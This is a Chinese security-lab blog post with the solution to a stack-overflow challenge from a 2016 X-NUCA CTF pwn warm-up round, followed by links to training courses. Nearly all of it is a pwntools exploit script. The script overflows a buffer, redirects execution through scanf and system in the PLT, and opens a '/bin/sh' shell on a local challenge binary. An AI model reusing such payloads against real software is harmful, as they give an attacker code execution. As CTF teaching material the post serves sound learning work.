X-NUCA(牛咖)联赛9月pwn专题赛赛前--stack overflow的解题思路

发表于:2016-09-20 16:00:00 来源:  合天网安实验室 阅读数(0人)

栈溢出,覆盖返回地址,并覆盖为system@plt即可。


exp:


frompwn import *
import time
#by wangaohui

context.log_level = 'debug
exe = 'pwn2'

s= remote('127.0.0.1',10001,timeout=60)
defgetpid():
time.sleep(0.1)
pid= pwnlib.util.proc.pidof(exe)
printpid
raw_input('go!')
getpid()

plt_scanf = 0x08048530
plt_system = 0x080484D0
format_s = 0x08048C17
buf = 0x080491C0

s.recvuntil('4.quit')
s.sendline('1')
s.recvuntil('4.quit')
s.sendline('2')
s.recvuntil('please input the number you want to edit')
s.sendline('0')
s.recvuntil('please input name:')
s.sendline('aaa')
s.recvuntil('please input the items:')
#data = 'a'*0x34+p32(plt_scanf)+p32(plt_system)+p32(format_s)+p32(buf)
data = 'a'*0x1c + p32(0) + 'a'*0x14+p32(plt_scanf)+p32(plt_system)+p32(format_s)+p32(buf)
s.sendline(data)
s.sendline('/bin/sh\x00')
s.interactive()


相关新闻

大家都在学

课程详情

CTF-PWN进阶训练

课程详情

PWN进阶训练

课程详情

PWN综合练习